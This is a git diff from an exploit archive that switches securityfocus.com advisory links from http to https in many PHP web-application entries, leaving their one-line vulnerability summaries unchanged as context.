@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15524/info +source: https://www.securityfocus.com/bid/15524/info PHP-Post is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26549.txt b/exploits/php/webapps/26549.txt index 617593f08..ec6d9a6b1 100644 --- a/exploits/php/webapps/26549.txt +++ b/exploits/php/webapps/26549.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15530/info +source: https://www.securityfocus.com/bid/15530/info Torrential is prone to a directory traversal vulnerability. This is due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/php/webapps/26559.txt b/exploits/php/webapps/26559.txt index ffbbad59e..2b0655219 100644 --- a/exploits/php/webapps/26559.txt +++ b/exploits/php/webapps/26559.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15538/info +source: https://www.securityfocus.com/bid/15538/info Virtual Hosting Control System is prone to cross-site scripting attacks. diff --git a/exploits/php/webapps/26560.txt b/exploits/php/webapps/26560.txt index 5096716cc..4b11dea82 100644 --- a/exploits/php/webapps/26560.txt +++ b/exploits/php/webapps/26560.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15539/info +source: https://www.securityfocus.com/bid/15539/info PmWiki is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26561.txt b/exploits/php/webapps/26561.txt index a897228e0..f14b10add 100644 --- a/exploits/php/webapps/26561.txt +++ b/exploits/php/webapps/26561.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15544/info +source: https://www.securityfocus.com/bid/15544/info 1-2-3 Music Store is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26562.txt b/exploits/php/webapps/26562.txt index 760aba8de..29200c2c8 100644 --- a/exploits/php/webapps/26562.txt +++ b/exploits/php/webapps/26562.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15545/info +source: https://www.securityfocus.com/bid/15545/info AFFCommerce Shopping Cart is prone to multiple SQL injection vulnerabilities. diff --git a/exploits/php/webapps/26563.txt b/exploits/php/webapps/26563.txt index ad2598e97..092d99454 100644 --- a/exploits/php/webapps/26563.txt +++ b/exploits/php/webapps/26563.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15545/info +source: https://www.securityfocus.com/bid/15545/info AFFCommerce Shopping Cart is prone to multiple SQL injection vulnerabilities. diff --git a/exploits/php/webapps/26564.txt b/exploits/php/webapps/26564.txt index 00159fdf6..bee691184 100644 --- a/exploits/php/webapps/26564.txt +++ b/exploits/php/webapps/26564.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15545/info +source: https://www.securityfocus.com/bid/15545/info AFFCommerce Shopping Cart is prone to multiple SQL injection vulnerabilities. diff --git a/exploits/php/webapps/26565.txt b/exploits/php/webapps/26565.txt index fd500d052..061600c29 100644 --- a/exploits/php/webapps/26565.txt +++ b/exploits/php/webapps/26565.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15548/info +source: https://www.securityfocus.com/bid/15548/info Tunez is prone to multiple input validation vulnerabilities. diff --git a/exploits/php/webapps/26566.txt b/exploits/php/webapps/26566.txt index f1a48ffa5..d4dd54570 100644 --- a/exploits/php/webapps/26566.txt 
+++ b/exploits/php/webapps/26566.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15548/info +source: https://www.securityfocus.com/bid/15548/info Tunez is prone to multiple input validation vulnerabilities. diff --git a/exploits/php/webapps/26567.txt b/exploits/php/webapps/26567.txt index 0047f4251..974ff9f6c 100644 --- a/exploits/php/webapps/26567.txt +++ b/exploits/php/webapps/26567.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15549/info +source: https://www.securityfocus.com/bid/15549/info WSN Forum is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26568.txt b/exploits/php/webapps/26568.txt index fa1df6490..9375ce6b9 100644 --- a/exploits/php/webapps/26568.txt +++ b/exploits/php/webapps/26568.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15550/info +source: https://www.securityfocus.com/bid/15550/info OmnistarLive is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26569.txt b/exploits/php/webapps/26569.txt index 4b2f2a055..32ca39415 100644 --- a/exploits/php/webapps/26569.txt +++ b/exploits/php/webapps/26569.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15551/info +source: https://www.securityfocus.com/bid/15551/info PHP Labs Survey Wizard is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26570.txt b/exploits/php/webapps/26570.txt index 45fe1852f..479e64eb4 100644 --- a/exploits/php/webapps/26570.txt +++ b/exploits/php/webapps/26570.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15552/info +source: https://www.securityfocus.com/bid/15552/info CommodityRentals is prone to an SQL injection vulnerability. diff --git a/exploits/php/webapps/26571.txt b/exploits/php/webapps/26571.txt index 15b23ad37..c6738ae85 100644 --- a/exploits/php/webapps/26571.txt +++ b/exploits/php/webapps/26571.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15553/info +source: https://www.securityfocus.com/bid/15553/info Ezyhelpdesk is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26572.txt b/exploits/php/webapps/26572.txt index 0617fcc42..f9cbd271f 100644 --- a/exploits/php/webapps/26572.txt +++ b/exploits/php/webapps/26572.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15555/info +source: https://www.securityfocus.com/bid/15555/info blogBuddies is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26573.txt b/exploits/php/webapps/26573.txt index aab42065d..3cc7b90d0 100644 --- a/exploits/php/webapps/26573.txt +++ b/exploits/php/webapps/26573.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15555/info +source: https://www.securityfocus.com/bid/15555/info blogBuddies is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26574.txt b/exploits/php/webapps/26574.txt index 4f8a6a52d..a06326bc9 100644 --- a/exploits/php/webapps/26574.txt +++ b/exploits/php/webapps/26574.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15555/info +source: https://www.securityfocus.com/bid/15555/info blogBuddies is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26576.txt b/exploits/php/webapps/26576.txt index 70e478ff6..0fca3a9a0 100644 --- a/exploits/php/webapps/26576.txt +++ b/exploits/php/webapps/26576.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15559/info +source: https://www.securityfocus.com/bid/15559/info freeForum is prone to multiple SQL injection vulnerabilities. diff --git a/exploits/php/webapps/26580.txt b/exploits/php/webapps/26580.txt index 12c7ac847..2901766d6 100644 --- a/exploits/php/webapps/26580.txt +++ b/exploits/php/webapps/26580.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15561/info +source: https://www.securityfocus.com/bid/15561/info Softbiz Web Host Directory Script is prone to multiple SQL injection vulnerabilities. These issues occur because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26581.txt b/exploits/php/webapps/26581.txt index 15cba456b..030610b03 100644 --- a/exploits/php/webapps/26581.txt +++ b/exploits/php/webapps/26581.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15561/info +source: https://www.securityfocus.com/bid/15561/info Softbiz Web Host Directory Script is prone to multiple SQL injection vulnerabilities. These issues occur because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26582.txt b/exploits/php/webapps/26582.txt index ad67b703e..ac7b5c86d 100644 --- a/exploits/php/webapps/26582.txt +++ b/exploits/php/webapps/26582.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15561/info +source: https://www.securityfocus.com/bid/15561/info Softbiz Web Host Directory Script is prone to multiple SQL injection vulnerabilities. These issues occur because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26583.txt b/exploits/php/webapps/26583.txt index 89f47e7ad..ff2e2218f 100644 --- a/exploits/php/webapps/26583.txt +++ b/exploits/php/webapps/26583.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15561/info +source: https://www.securityfocus.com/bid/15561/info Softbiz Web Host Directory Script is prone to multiple SQL injection vulnerabilities. These issues occur because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26584.txt b/exploits/php/webapps/26584.txt index ba740db8b..4c1b7607b 100644 --- a/exploits/php/webapps/26584.txt +++ b/exploits/php/webapps/26584.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15562/info +source: https://www.securityfocus.com/bid/15562/info vtiger CRM is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26585.txt b/exploits/php/webapps/26585.txt index a3a613b54..24952f5b8 100644 --- a/exploits/php/webapps/26585.txt +++ b/exploits/php/webapps/26585.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15562/info +source: https://www.securityfocus.com/bid/15562/info vtiger CRM is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26586.txt b/exploits/php/webapps/26586.txt index 70fe6c536..15fbc792c 100644 --- a/exploits/php/webapps/26586.txt +++ b/exploits/php/webapps/26586.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15562/info +source: https://www.securityfocus.com/bid/15562/info vtiger CRM is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26587.txt b/exploits/php/webapps/26587.txt index bebaa6752..9660da575 100644 --- a/exploits/php/webapps/26587.txt +++ b/exploits/php/webapps/26587.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15563/info +source: https://www.securityfocus.com/bid/15563/info Comdev Vote Caster is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26588.txt b/exploits/php/webapps/26588.txt index c2e9f2bb8..d323451ae 100644 --- a/exploits/php/webapps/26588.txt +++ b/exploits/php/webapps/26588.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15565/info +source: https://www.securityfocus.com/bid/15565/info Orca Forum is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26589.txt b/exploits/php/webapps/26589.txt index 8e3023e8a..869512e37 100644 --- a/exploits/php/webapps/26589.txt +++ b/exploits/php/webapps/26589.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15566/info +source: https://www.securityfocus.com/bid/15566/info OvBB is prone to multiple SQL injection vulnerabilities. diff --git a/exploits/php/webapps/26590.txt b/exploits/php/webapps/26590.txt index f5c9547bd..13d8ac63d 100644 --- a/exploits/php/webapps/26590.txt +++ b/exploits/php/webapps/26590.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15566/info +source: https://www.securityfocus.com/bid/15566/info OvBB is prone to multiple SQL injection vulnerabilities. 
diff --git a/exploits/php/webapps/26591.txt b/exploits/php/webapps/26591.txt index c8b2d4926..da55a42e5 100644 --- a/exploits/php/webapps/26591.txt +++ b/exploits/php/webapps/26591.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15568/info +source: https://www.securityfocus.com/bid/15568/info eFiction is prone to SQL injection, remote file upload, and cross site scripting vulnerabilities. diff --git a/exploits/php/webapps/26592.txt b/exploits/php/webapps/26592.txt index 36760b50b..ae2cbf085 100644 --- a/exploits/php/webapps/26592.txt +++ b/exploits/php/webapps/26592.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15568/info +source: https://www.securityfocus.com/bid/15568/info eFiction is prone to SQL injection, remote file upload, and cross site scripting vulnerabilities. diff --git a/exploits/php/webapps/26593.txt b/exploits/php/webapps/26593.txt index b0c175885..c7251523d 100644 --- a/exploits/php/webapps/26593.txt +++ b/exploits/php/webapps/26593.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15568/info +source: https://www.securityfocus.com/bid/15568/info eFiction is prone to SQL injection, remote file upload, and cross site scripting vulnerabilities. diff --git a/exploits/php/webapps/26594.txt b/exploits/php/webapps/26594.txt index 8be3964bd..893f3306a 100644 --- a/exploits/php/webapps/26594.txt +++ b/exploits/php/webapps/26594.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15568/info +source: https://www.securityfocus.com/bid/15568/info eFiction is prone to SQL injection, remote file upload, and cross site scripting vulnerabilities. diff --git a/exploits/php/webapps/26595.txt b/exploits/php/webapps/26595.txt index adaa27004..a7053761c 100644 --- a/exploits/php/webapps/26595.txt +++ b/exploits/php/webapps/26595.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15570/info +source: https://www.securityfocus.com/bid/15570/info Support Center is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26596.txt b/exploits/php/webapps/26596.txt index 4c03a25e4..1658b1bda 100644 --- a/exploits/php/webapps/26596.txt +++ b/exploits/php/webapps/26596.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15572/info +source: https://www.securityfocus.com/bid/15572/info AgileBill is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly santize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26597.txt b/exploits/php/webapps/26597.txt index 988881033..1d82ef321 100644 --- a/exploits/php/webapps/26597.txt +++ b/exploits/php/webapps/26597.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15573/info +source: https://www.securityfocus.com/bid/15573/info PBLang is prone to multiple HTML injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/26598.txt b/exploits/php/webapps/26598.txt index 19fdfb068..ff24e7237 100644 --- a/exploits/php/webapps/26598.txt +++ b/exploits/php/webapps/26598.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15574/info +source: https://www.securityfocus.com/bid/15574/info Athena PHP Website Administration is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26599.txt b/exploits/php/webapps/26599.txt index 9c40c10a6..729f78ece 100644 --- a/exploits/php/webapps/26599.txt +++ b/exploits/php/webapps/26599.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15575/info +source: https://www.securityfocus.com/bid/15575/info phpGreetz is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26600.txt b/exploits/php/webapps/26600.txt index b0da9c811..1c00b543b 100644 --- a/exploits/php/webapps/26600.txt +++ b/exploits/php/webapps/26600.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15576/info +source: https://www.securityfocus.com/bid/15576/info Q-News is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26602.txt b/exploits/php/webapps/26602.txt index d310f8fb1..abaa49c77 100644 --- a/exploits/php/webapps/26602.txt +++ b/exploits/php/webapps/26602.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15578/info +source: https://www.securityfocus.com/bid/15578/info Enterprise Connector is prone to SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26603.txt b/exploits/php/webapps/26603.txt index bc2739d86..728586780 100644 --- a/exploits/php/webapps/26603.txt +++ b/exploits/php/webapps/26603.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15578/info +source: https://www.securityfocus.com/bid/15578/info Enterprise Connector is prone to SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26604.txt b/exploits/php/webapps/26604.txt index 1bd645e10..389036aa3 100644 --- a/exploits/php/webapps/26604.txt +++ b/exploits/php/webapps/26604.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15579/info +source: https://www.securityfocus.com/bid/15579/info Zainu is prone to SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26605.txt b/exploits/php/webapps/26605.txt index bff594ea8..426db37ca 100644 --- a/exploits/php/webapps/26605.txt +++ b/exploits/php/webapps/26605.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15580/info +source: https://www.securityfocus.com/bid/15580/info Babe Logger is prone to SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26606.txt b/exploits/php/webapps/26606.txt index 078187939..27d9ca8ff 100644 --- a/exploits/php/webapps/26606.txt +++ b/exploits/php/webapps/26606.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15580/info +source: https://www.securityfocus.com/bid/15580/info Babe Logger is prone to SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26607.txt b/exploits/php/webapps/26607.txt index 31bd27acc..ec4f9e068 100644 --- a/exploits/php/webapps/26607.txt +++ b/exploits/php/webapps/26607.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15581/info +source: https://www.securityfocus.com/bid/15581/info Top Music Module for PHP-Nuke is prone to SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26608.txt b/exploits/php/webapps/26608.txt index d2f54edb3..73730e8dd 100644 --- a/exploits/php/webapps/26608.txt +++ b/exploits/php/webapps/26608.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15582/info +source: https://www.securityfocus.com/bid/15582/info PHPWordPress is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26609.txt b/exploits/php/webapps/26609.txt index 8b1f29696..911c36092 100644 --- a/exploits/php/webapps/26609.txt +++ b/exploits/php/webapps/26609.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15583/info +source: https://www.securityfocus.com/bid/15583/info Bedeng PSP is prone to SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26610.txt b/exploits/php/webapps/26610.txt index 1d99a4116..69667cb5f 100644 --- a/exploits/php/webapps/26610.txt +++ b/exploits/php/webapps/26610.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15583/info +source: https://www.securityfocus.com/bid/15583/info Bedeng PSP is prone to SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26611.txt b/exploits/php/webapps/26611.txt index be45eff10..65443b4ba 100644 --- a/exploits/php/webapps/26611.txt +++ b/exploits/php/webapps/26611.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15583/info +source: https://www.securityfocus.com/bid/15583/info Bedeng PSP is prone to SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26612.txt b/exploits/php/webapps/26612.txt index 415a2436f..b57de6996 100644 --- a/exploits/php/webapps/26612.txt +++ b/exploits/php/webapps/26612.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15584/info +source: https://www.securityfocus.com/bid/15584/info Nelogic Nephp Publisher is prone to SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26613.txt b/exploits/php/webapps/26613.txt index e699bfc2a..016122e36 100644 --- a/exploits/php/webapps/26613.txt +++ b/exploits/php/webapps/26613.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15585/info +source: https://www.securityfocus.com/bid/15585/info Softbiz Resource Repository Script is prone to SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26614.txt b/exploits/php/webapps/26614.txt index 4b5c5f448..bffb197b0 100644 --- a/exploits/php/webapps/26614.txt +++ b/exploits/php/webapps/26614.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15585/info +source: https://www.securityfocus.com/bid/15585/info Softbiz Resource Repository Script is prone to SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26615.txt b/exploits/php/webapps/26615.txt index 45679970b..4e72aab0b 100644 --- a/exploits/php/webapps/26615.txt +++ b/exploits/php/webapps/26615.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15585/info +source: https://www.securityfocus.com/bid/15585/info Softbiz Resource Repository Script is prone to SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26616.txt b/exploits/php/webapps/26616.txt index a32a98f23..a66b6555a 100644 
--- a/exploits/php/webapps/26616.txt +++ b/exploits/php/webapps/26616.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15585/info +source: https://www.securityfocus.com/bid/15585/info Softbiz Resource Repository Script is prone to SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26617.txt b/exploits/php/webapps/26617.txt index b976f0ec6..44cbf9c61 100644 --- a/exploits/php/webapps/26617.txt +++ b/exploits/php/webapps/26617.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15586/info +source: https://www.securityfocus.com/bid/15586/info BerliOS SourceWell is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26618.txt b/exploits/php/webapps/26618.txt index 817d2a9a4..bff450d8f 100644 --- a/exploits/php/webapps/26618.txt +++ b/exploits/php/webapps/26618.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15587/info +source: https://www.securityfocus.com/bid/15587/info AllWeb Search is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26619.txt b/exploits/php/webapps/26619.txt index 2daff8a12..b222b9ea5 100644 --- a/exploits/php/webapps/26619.txt +++ b/exploits/php/webapps/26619.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15588/info +source: https://www.securityfocus.com/bid/15588/info K-Search is prone to SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26625.txt b/exploits/php/webapps/26625.txt index 03c0497fb..81ea7b448 100644 
--- a/exploits/php/webapps/26625.txt +++ b/exploits/php/webapps/26625.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15589/info +source: https://www.securityfocus.com/bid/15589/info edmoBBS is prone to SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26626.txt b/exploits/php/webapps/26626.txt index b932a2d41..baa38ad2d 100644 --- a/exploits/php/webapps/26626.txt +++ b/exploits/php/webapps/26626.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15591/info +source: https://www.securityfocus.com/bid/15591/info UGroup is prone to SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26627.txt b/exploits/php/webapps/26627.txt index 0864f4e69..9f91d8835 100644 --- a/exploits/php/webapps/26627.txt +++ b/exploits/php/webapps/26627.txt @@ -1,4 +1,4 @@ -ource: http://www.securityfocus.com/bid/15591/info +ource: https://www.securityfocus.com/bid/15591/info UGroup is prone to SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26628.txt b/exploits/php/webapps/26628.txt index 01c6cfa62..773a4a148 100644 --- a/exploits/php/webapps/26628.txt +++ b/exploits/php/webapps/26628.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15592/info +source: https://www.securityfocus.com/bid/15592/info ShockBoard is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26629.txt b/exploits/php/webapps/26629.txt index be154d297..29bf73a92 100644 --- a/exploits/php/webapps/26629.txt 
+++ b/exploits/php/webapps/26629.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15593/info +source: https://www.securityfocus.com/bid/15593/info Netzbrett is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26630.txt b/exploits/php/webapps/26630.txt index d808f886a..b08899cff 100644 --- a/exploits/php/webapps/26630.txt +++ b/exploits/php/webapps/26630.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15595/info +source: https://www.securityfocus.com/bid/15595/info ADC2000 NG Pro is prone to SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26631.txt b/exploits/php/webapps/26631.txt index 48d07f703..46a0df435 100644 --- a/exploits/php/webapps/26631.txt +++ b/exploits/php/webapps/26631.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15596/info +source: https://www.securityfocus.com/bid/15596/info Simple Document Management System (SDMS) is prone to SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26632.txt b/exploits/php/webapps/26632.txt index f53162647..685914987 100644 --- a/exploits/php/webapps/26632.txt +++ b/exploits/php/webapps/26632.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15596/info +source: https://www.securityfocus.com/bid/15596/info Simple Document Management System (SDMS) is prone to SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26633.txt b/exploits/php/webapps/26633.txt index fe11b96ab..10bdbe37b 100644 
--- a/exploits/php/webapps/26633.txt +++ b/exploits/php/webapps/26633.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15598/info +source: https://www.securityfocus.com/bid/15598/info PDJK-support Suite is prone to multiple SQL injection vulnerabilities. These vulnerabilities could permit remote attackers to pass malicious input to database queries, resulting in modification of query logic or other attacks. diff --git a/exploits/php/webapps/26634.txt b/exploits/php/webapps/26634.txt index 788fb7d51..c3315d08c 100644 --- a/exploits/php/webapps/26634.txt +++ b/exploits/php/webapps/26634.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15599/info +source: https://www.securityfocus.com/bid/15599/info Randshop is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26635.txt b/exploits/php/webapps/26635.txt index 45a1ebbf9..4b24081d8 100644 --- a/exploits/php/webapps/26635.txt +++ b/exploits/php/webapps/26635.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15601/info +source: https://www.securityfocus.com/bid/15601/info FreeWebStat is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26636.txt b/exploits/php/webapps/26636.txt index 5622468e0..c6b7fee3d 100644 --- a/exploits/php/webapps/26636.txt +++ b/exploits/php/webapps/26636.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15603/info +source: https://www.securityfocus.com/bid/15603/info PHP Web Statistik is prone to multiple content injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. The vulnerabilities could allow for HTML injection and cross-site scripting attacks. 
